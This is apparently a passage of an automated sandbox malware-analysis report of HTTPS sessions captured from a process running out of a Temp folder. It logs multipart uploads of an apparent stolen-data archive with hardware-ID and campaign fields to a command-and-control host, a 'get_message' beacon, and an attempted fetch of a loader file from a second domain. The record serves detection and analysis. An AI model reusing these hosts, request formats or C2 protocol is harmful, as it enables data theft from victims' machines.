                                                                                                                                                                            2024-12-22 22:28:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            7192.168.2.549805172.67.186.1894436380C:\Users\user\AppData\Local\Temp\124531\Designing.com
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-22 22:29:01 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=FGTA4F6GQKZXW
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                            Content-Length: 557508
                                                                                                                                                                            Host: quantitypitt.click
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 2d 2d 46 47 54 41 34 46 36 47 51 4b 5a 58 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 36 35 44 35 35 32 32 43 34 41 42 36 31 30 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 46 47 54 41 34 46 36 47 51 4b 5a 58 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 47 54 41 34 46 36 47 51 4b 5a 58 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 0d 0a 2d 2d 46 47 54 41 34 46 36 47 51 4b 5a 58
                                                                                                                                                                            Data Ascii: --FGTA4F6GQKZXWContent-Disposition: form-data; name="hwid"E365D5522C4AB610165F70E3262EAA47--FGTA4F6GQKZXWContent-Disposition: form-data; name="pid"1--FGTA4F6GQKZXWContent-Disposition: form-data; name="lid"hRjzG3--VIKA--FGTA4F6GQKZX
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 96 5b 79 8d 26 a6 86 18 6c 14 ef d9 f5 f4 af d2 4d 30 09 46 27 3a cf 52 23 3d 63 f9 b6 e1 ee 1c 48 43 51 ca df 64 11 17 86 2f 47 97 d6 e4 07 4a cd 05 b0 5f 68 af 88 83 77 ca 2d d5 46 4d 4b d1 df 71 e7 fc cc 9e 28 c6 cb 6e fd 92 25 a7 78 cb de d8 f1 34 7f 4b ab c7 e3 be af c0 a2 8e 64 42 f7 0f 61 94 81 d9 68 15 ff 42 91 d4 b8 ac 44 61 9a a5 0b 74 29 55 32 6e 2d 93 45 19 12 bd 54 91 38 9e 11 41 b2 36 6d f7 95 ad 78 54 0b 4b 48 4a 6e 67 28 47 c2 42 89 de ac d9 e9 dd 82 60 59 88 91 4c 2d 3a 8d 0b b4 47 53 4b b6 3a 1d 9f 26 57 7a 3c c7 c3 5e 50 85 88 54 da 27 88 1e 23 cd 4a 8f 82 52 27 9c 19 ba 78 96 48 f3 e5 83 4c 07 d8 91 bb c8 ae 53 40 ad f2 03 fa 92 c8 d6 4e 34 3c a7 dd 0a 98 45 21 95 7c 28 50 5f 7a ac c8 0a b6 de 32 72 15 b2 5b bb 27 d5 f4 9c 69 7f f9 bd
                                                                                                                                                                            Data Ascii: [y&lM0F':R#=cHCQd/GJ_hw-FMKq(n%x4KdBahBDat)U2n-ET8A6mxTKHJng(GB`YL-:GSK:&Wz<^PT'#JR'xHLS@N4<E!|(P_z2r['i
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 99 d7 9b b8 cf cf e7 e7 87 d7 37 b4 d8 f7 b8 da f5 06 04 57 ed 45 19 c3 fa 66 c6 c3 7c 88 6f 5e 7a fe ca 8c d5 40 28 3f 31 28 d0 8a e6 90 ad da ad c5 e7 29 49 1e fa 95 da 0c c9 33 e4 ff 3c 22 8e aa 56 68 48 3c 30 10 a8 8b 57 97 94 bb 60 9d 29 54 1d 1e 7e 70 9c d6 b8 6e 9a 90 39 df c5 66 1a 56 a8 7d 33 b4 9e 79 91 26 32 2e cb 7d bd 8d 78 cb 48 17 77 d0 36 a1 f5 d2 83 d7 ca 5e a4 5e c2 a1 91 7a eb 9a 93 d5 a7 11 d9 bf 61 d1 55 f1 57 53 d9 2d ff 8d 01 57 7a 8a 43 c0 6c c1 a4 66 97 dd 23 de b7 4a 8e eb 5d b6 81 27 4a f0 1c f0 1b f8 be f5 17 ef e7 bf 59 6d f3 5c 66 f5 b2 ed d0 c6 85 bb 9d 17 5d 5e 3b f2 9a 44 7e b8 05 bb 07 6c 54 da af 5f d2 75 e7 ce 07 2d a9 b7 ff fc 53 05 4d 57 05 69 a1 8c 42 e1 0a 43 88 3a f1 e8 b3 fe 73 43 ee da 4e 19 ce 12 60 a1 f0 73 83
                                                                                                                                                                            Data Ascii: 7WEf|o^z@(?1()I3<"VhH<0W`)T~pn9fV}3y&2.}xHw6^^zaUWS-WzClf#J]'JYm\f]^;D~lT_u-SMWiBC:sCN`s
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 39 11 e5 f8 a8 a3 c2 ef f0 56 70 4e 32 0f 60 4a 5d 62 09 04 5d 36 18 bc 80 7a 10 b6 98 8b e1 4a 01 a6 ff 4c 65 45 0a fb ad 10 0a c5 2d f1 ca f6 ef 24 3a c0 e1 81 7e 2a 9f f7 0a a4 be a6 10 ba 17 8d e4 ec d4 8a c3 6e 10 a3 ce 9c 17 1d a1 bd fb d7 c4 ec bd 5b 5f 3d 8a 00 c8 8a 5e 5d 32 69 ca 11 93 4a dd 68 46 f7 a5 59 a4 3a 11 47 91 05 ff a7 47 c8 7f bb fb 53 ff 5e d9 a5 ff 0b 42 c0 d1 34 48 6b 22 c4 bc 96 00 b2 3d 3d 39 9e 7e a0 de 75 c7 c1 57 21 81 cd 7e 68 f2 03 d8 55 2c 5a 1a de ec 14 58 bc 0b c8 9e 56 60 74 fe b3 5f 7f 64 2b 66 3d 0c ac 49 72 85 95 16 ed 00 fc 65 f0 dd 70 a5 f7 fa c3 aa ca df 73 97 f3 f4 bc db d1 e7 05 b0 25 56 6a 8c 64 43 a0 40 a0 79 9c 14 d4 ce d1 98 ca e8 89 cf 61 bc ea 70 d2 45 d3 d2 2c 90 54 f3 62 cb a6 70 7a b0 06 2e a8 26 7f 86
                                                                                                                                                                            Data Ascii: 9VpN2`J]b]6zJLeE-$:~*n[_=^]2iJhFY:GGS^B4Hk"==9~uW!~hU,ZXV`t_d+f=Ireps%VjdC@yapE,Tbpz.&
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 19 8c 75 de 8b 5d db 47 2a 6b b2 20 23 ac 1c 0c 09 b0 71 83 a6 ad 41 4f 1e 51 7a db 74 c6 04 f6 9f 98 b3 2a a6 8e 62 ce e5 45 ed 4a 0a a1 e1 cf 51 5c 05 2d 7b 85 aa bc af a5 4a c3 da dd 6f 9b 48 0a 9c 2d bd f9 71 a4 1c 89 f5 f1 f3 db 0f 09 35 74 1a 73 af e1 20 68 63 2b a9 b8 c9 11 42 43 58 68 05 bf 0a d6 89 d9 7b 49 b4 c7 f6 db d8 c3 29 a8 4a fe 61 c2 8b fc e6 77 f5 73 d7 17 c2 63 af f5 1d 08 6a c3 e7 45 85 ef 00 ea a1 f4 24 61 57 e7 54 1f a1 73 00 79 e4 55 ca 83 c9 28 72 b4 17 f4 4e 21 01 10 06 20 bf fd bd 7f 1b 0f 44 ad 1e c5 49 0b 37 64 ec 6a ae 0b e3 e7 97 62 ff 12 17 53 c0 8a 1c a0 2f 07 b6 0a 55 6d c2 a5 9e 1f 5f 1b 96 33 e2 58 8f 6e 44 54 b8 28 84 f2 83 9f 1e 32 37 5a 4e 63 61 ef 3f 9e 47 ab 9c 52 14 5a ea 22 f9 81 c5 22 f0 cf 4d 6b b6 bc 6b f1 c3
                                                                                                                                                                            Data Ascii: u]G*k #qAOQzt*bEJQ\-{JoH-q5ts hc+BCXh{I)JawscjE$aWTsyU(rN! DI7djbS/Um_3XnDT(27ZNca?GRZ""Mkk
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 35 96 f9 b9 ad 1b 15 30 26 8c 58 b7 10 1a 08 49 c7 c0 14 2e 84 ad b6 61 bc ef 1b 1a 05 fa 97 c6 38 92 16 74 19 a0 af f5 67 df 31 c3 66 19 6d 5e c3 d2 0f 0c f8 b4 c1 fc f9 c6 75 61 c3 9f 2a f9 21 82 57 74 0a 9b d5 04 3b 4b e7 fb 23 63 0c cf 23 fb 79 5d d2 1b 0a 7c 3e 67 e5 b8 4b 87 a1 da fa 4d 13 54 a2 c0 fc fc 2d e1 e9 af 80 1e ff 69 be f4 06 3b 1d 50 4a 21 38 d3 fb 08 72 f3 08 af 30 87 6f 03 bd fa b9 16 0b c7 fa 6d 39 f1 da e7 4a ff 64 a3 03 45 60 b4 1a 29 54 c0 48 2b ae 3a e3 db bc 05 0b ae 6c f8 9f 96 86 94 24 10 22 93 f8 ed 9b 0b 08 3e f1 d3 22 df 89 e3 3b 29 d5 80 a0 78 75 e3 f9 80 2c fc 0b 0d ec a1 41 2c 20 cb 4a 7c 23 d1 c5 20 ba c5 39 81 34 1c d8 83 52 f8 7d 88 ee 45 20 ec f7 04 65 37 90 7c d1 a9 81 80 8f ff 81 77 ed bd f2 e5 bc 13 d6 15 c5 c7 cc
                                                                                                                                                                            Data Ascii: 50&XI.a8tg1fm^ua*!Wt;K#c#y]|>gKMT-i;PJ!8r0om9JdE`)TH+:l$">";)xu,A, J|# 94R}E e7|w
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 65 58 e6 59 d8 98 5e 42 9c c2 be 7d 7d ca 70 2d ea b5 ad dc c2 8e de 42 76 3a b3 43 a5 cb 00 d4 6e ac fe 51 04 51 2b a9 8a 3f 78 21 4d 2b cf 4a 42 d6 d7 02 ff 64 53 68 21 63 2d 7e 3c ee c6 8f 56 ea 6a f9 79 34 75 80 e7 cb b3 5d ae 08 cf 56 d2 23 d6 ec b9 10 b3 96 79 64 e9 df c3 47 96 d6 59 54 c3 57 bd fd 21 1f c3 db 81 53 2b b7 c6 9b a3 7f 75 f4 bf a9 ad ac 31 c0 b8 7b 24 64 a5 5f 0e 88 03 2f cf ff 5b 11 aa 6d c8 e7 75 5b d4 ff ec 49 59 8b b3 5f dd de f9 24 72 ab a6 3d 50 21 29 c3 ca 74 ef 92 13 d3 e1 4b 48 1d 13 7c 6a 83 12 ea 68 32 d6 59 40 e0 72 6f 54 e9 2e 52 cb 37 f4 cb ff 7f ad 60 70 f0 e6 aa d1 2b a0 2d 9e 2e 0e b2 a4 d1 4a fa e0 18 b6 b8 ad 54 43 e4 db 7d 38 e2 e8 bc 41 04 77 ab 03 0e 92 5c 3f 69 a4 2d 03 e0 c9 f5 5f ea f5 de 42 14 ad e8 d2 6f 33
                                                                                                                                                                            Data Ascii: eXY^B}}p-Bv:CnQQ+?x!M+JBdSh!c-~<Vjy4u]V#ydGYTW!S+u1{$d_/[mu[IY_$r=P!)tKH|jh2Y@roT.R7`p+-.JTC}8Aw\?i-_Bo3
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 1c 89 39 40 3e 8c a7 f9 0a ef 3d 80 8b 4b b4 07 09 2d f7 69 69 e2 f5 b3 2f 7f 73 5c 36 6a 4d 56 7e d7 9e 94 70 0e 82 8e 91 3e ec ee aa fb 91 d8 85 55 62 d2 9e 2c 2a 36 3b c8 37 fe f1 3f d9 28 f0 9a d5 b5 b7 d8 39 93 e3 e3 7f 96 a6 de 79 54 9a 38 a6 fe b4 6a 8c bc 56 b5 25 be 20 36 e6 55 01 03 16 a5 f1 6c bb 78 c5 74 52 5f 7a bf f9 93 0f 0a 63 fe 79 1a e2 16 ef 7e b5 4e 8e 87 53 e3 07 29 df 2d cf 3d 29 0f 92 15 3f 56 97 11 44 38 e5 e0 55 f5 8b e4 a1 b1 33 b3 10 1b 10 ff fe 27 e4 f3 24 cc 41 dc 1c 8c 02 9e d2 f4 ba 06 27 e7 8c 6a 4b 71 30 bd 8d d7 b2 27 3e 4c b0 3f 36 98 b8 28 f7 1b 9a 3b 1a 52 9e 07 04 23 0a 6b 39 f6 df 08 a7 55 8d b0 72 6f 6e b9 14 d4 06 21 89 26 36 7a ac bf 50 7f 65 a2 cb 22 68 0a f1 cb d3 76 c7 07 09 53 bf e0 23 a5 7b da 47 9f be 2f 61
                                                                                                                                                                            Data Ascii: 9@>=K-ii/s\6jMV~p>Ub,*6;7?(9yT8jV% 6UlxtR_zcy~NS)-=)?VD8U3'$A'jKq0'>L?6(;R#k9Uron!&6zPe"hvS#{G/a
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 38 ef ae 80 b4 4c b2 16 ff a7 41 6a 8d 41 b8 d3 29 56 07 2a b7 a9 83 ec eb 8d 1b 6b 7f 3b cf d1 9a d3 4b 3c 68 69 22 ee 38 4c 18 3b f9 98 bc 36 64 59 7a 64 d3 1f c4 43 9a 74 3b bf 36 a5 89 28 bd 78 a0 da cc 7d 75 db 32 79 12 9a 07 33 04 21 a5 4b 96 ef 4f 42 f1 6b d6 b0 29 cf df 78 ba c9 55 b7 33 c7 54 df 25 21 35 e5 69 75 82 fc 4f cb fa 53 d2 17 49 d7 aa 3f 54 a9 ce b8 8e d8 2a 11 f8 75 fd a4 34 28 3b 8f 8a b2 88 b2 34 b3 76 d6 f4 54 b3 cc d0 c1 1d 1a dd 6f 19 cb d8 04 b2 03 b0 f2 4a b5 01 bb 5b 9e 5e 0b 16 05 c9 71 d2 51 16 b1 31 e1 b5 bb 23 5a d3 7b 23 a1 cc 95 e0 ff 79 3d 44 f6 bf 5f 2f 99 de ee 7f 20 0e b2 70 98 ff cf 01 9a 22 d3 6d b1 f0 bd d8 7c 85 d3 9d d7 ac 3f c7 6f 92 a9 9a a0 56 53 4b d0 b6 c7 76 c9 a9 46 db bf c7 2a 19 d1 bf 0f 71 a4 72 4f 8c
                                                                                                                                                                            Data Ascii: 8LAjA)V*k;K<hi"8L;6dYzdCt;6(x}u2y3!KOBk)xU3T%!5iuOSI?T*u4(;4vToJ[^qQ1#Z{#y=D_/ p"m|?oVSKvF*qrO
                                                                                                                                                                            2024-12-22 22:29:01 UTC15331OUTData Raw: 27 15 63 95 db 56 53 4a 5c 13 b6 bd bc c9 da 0c 69 11 97 08 33 04 d1 c6 c9 51 63 c4 74 26 3e 7b e4 f0 3c 40 34 02 3e 2e 8d 6c 88 94 a5 78 a6 a0 ed e2 32 7b 9f 46 93 aa cd 28 1a 6c 9a d3 07 43 c5 3e 0f 9c 84 59 aa 69 f8 09 47 c0 b4 ed 52 83 35 76 5e fe 63 06 2d 49 13 64 c0 85 ad c9 99 07 99 99 41 dc 7b ff 7a 3b 35 5a 44 3a 30 d2 b1 f1 4f 37 4a 7d 5e 1d 55 d8 88 69 78 52 e5 73 42 7e f2 fd 8a df 16 aa 79 2d 53 0c fa eb 4b b5 aa fc 52 f9 5e e1 37 5f aa b1 ff 11 06 de 1c b4 28 2d d1 a1 c0 e1 a7 e3 7d c9 ec f4 28 f3 2e 59 a9 cb dd d5 56 04 bd 26 63 30 4a c4 4c 14 1e 3a 95 67 e8 1e f7 be ee 2c ad a7 d0 f4 63 2d 1c 74 96 b6 55 7c d3 bf bc 1f 8b 59 3c 38 f8 57 85 9f 04 95 34 3c a4 4a b7 8d 89 5d a3 7c 36 5a af 77 30 6c c9 ac 7a 8f ca f4 81 4f e1 10 ea e2 fe 14 3f
                                                                                                                                                                            Data Ascii: 'cVSJ\i3Qct&>{<@4>.lx2{F(lC>YiGR5v^c-IdA{z;5ZD:0O7J}^UixRsB~y-SKR^7_(-}(.YV&c0JL:g,c-tU|Y<8W4<J]|6Zw0lzO?
                                                                                                                                                                            2024-12-22 22:29:03 UTC1147INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Sun, 22 Dec 2024 22:29:03 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Set-Cookie: PHPSESSID=e6cgr80crjtblar73ouo7d9oa7; expires=Thu, 17 Apr 2025 16:15:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jMp9GFD22TBBvk6%2FX2WZRNzM8CNGomy%2FxdeOY5376VVllYbn56cohPjxXjIY2gnYL5wtrofAo%2Bk%2B%2F2R1y6Qsfvgz247cfvpK%2BWmu%2BKSwBCAUr%2FpczVe9KMbZ52GG%2FNUBRBdDkN4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8f638c5d2e75de92-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1779&min_rtt=1723&rtt_var=686&sent=346&recv=586&lost=0&retrans=0&sent_bytes=2847&recv_bytes=560008&delivery_rate=1694718&cwnd=245&unsent_bytes=0&cid=c59986305f215176&ts=2284&x=0"


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            8192.168.2.549816172.67.186.1894436380C:\Users\user\AppData\Local\Temp\124531\Designing.com
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-22 22:29:05 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                            Content-Length: 113
                                                                                                                                                                            Host: quantitypitt.click
                                                                                                                                                                            2024-12-22 22:29:05 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 45 33 36 35 44 35 35 32 32 43 34 41 42 36 31 30 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37
                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--VIKA&j=637b55279021aab33278188cfa638397&hwid=E365D5522C4AB610165F70E3262EAA47
                                                                                                                                                                            2024-12-22 22:29:05 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Sun, 22 Dec 2024 22:29:05 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Set-Cookie: PHPSESSID=kmlk868ijg7vf8unruqn0bd4ei; expires=Thu, 17 Apr 2025 16:15:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DfrZqsLAWAUFNB4EaqgPE5IcW5taiMiIEUvTs1eaqYqsRAn9p8muPjOXC4yyPYU3PWSKLWkO1J7vUc0ChqAeJxCvh7dlb6RAnkuoKurq7Vpj0%2F7J9OgQQ0yorN46AIfsc3Pkf%2B4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8f638c74a8c00c8a-EWR
                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1676&rtt_var=651&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1016&delivery_rate=1652518&cwnd=108&unsent_bytes=0&cid=5507feadf9e2dddd&ts=883&x=0"
                                                                                                                                                                            2024-12-22 22:29:05 UTC218INData Raw: 64 34 0d 0a 71 59 45 54 39 69 63 6d 58 6e 59 78 4a 74 69 71 70 57 6d 49 58 6b 6d 49 66 58 79 76 51 54 62 35 6c 79 53 31 75 64 4e 31 66 54 58 79 2b 6a 47 44 42 52 78 38 48 6b 56 53 71 4e 6d 66 4e 61 63 43 5a 75 59 59 44 63 5a 76 52 5a 48 34 56 4f 6d 57 6f 42 45 61 58 39 44 30 5a 36 6f 49 56 69 30 65 48 31 4b 67 33 6f 64 46 71 6a 67 39 71 6b 64 4f 67 32 4e 54 32 36 30 56 79 4a 57 6f 56 77 67 58 6b 36 4e 37 67 6c 4e 57 4c 55 78 74 43 59 53 46 7a 67 58 68 4c 6a 33 68 42 77 32 42 4d 6c 36 57 35 33 69 61 30 4c 30 42 49 6c 62 46 38 55 79 61 51 31 51 42 42 56 6c 48 39 74 37 64 48 61 70 79 61 2b 34 4a 58 70 56 7a 47 74 76 79 42 6f 2b 49 72 69 67 3d 0d 0a
                                                                                                                                                                            Data Ascii: d4qYET9icmXnYxJtiqpWmIXkmIfXyvQTb5lyS1udN1fTXy+jGDBRx8HkVSqNmfNacCZuYYDcZvRZH4VOmWoBEaX9D0Z6oIVi0eH1Kg3odFqjg9qkdOg2NT260VyJWoVwgXk6N7glNWLUxtCYSFzgXhLj3hBw2BMl6W53ia0L0BIlbF8UyaQ1QBBVlH9t7dHapya+4JXpVzGtvyBo+Irig=
                                                                                                                                                                            2024-12-22 22:29:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            9192.168.2.549846172.67.191.1444436380C:\Users\user\AppData\Local\Temp\124531\Designing.com
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-22 22:29:17 UTC207OUTGET /int_clp_ldr_sha.txt HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                            Host: kliptizq.shop
                                                                                                                                                                            2024-12-22 22:29:18 UTC548INHTTP/1.1 403 Forbidden
                                                                                                                                                                            Date: Sun, 22 Dec 2024 22:29:17 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SgdMo%2FlmiMzguYF8JZyhNWcTi89c88o1%2Bxx3atAqJuRbSNIAUJ3foY4pQ7w8AnjSO7rsN4Tps3gOs3BUEyHqAQQ7z6Ss0U8XRvTOlGWW%2B3PRN98EcFEj73DLNHJJMpRX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                            CF-RAY: 8f638cc2ab095e5f-EWR
                                                                                                                                                                            2024-12-22 22:29:18 UTC821INData Raw: 31 31 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                            Data Ascii: 11d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                            2024-12-22 22:29:18 UTC1369INData Raw: 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d
                                                                                                                                                                            Data Ascii: errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-
                                                                                                                                                                            2024-12-22 22:29:18 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63
                                                                                                                                                                            Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-c
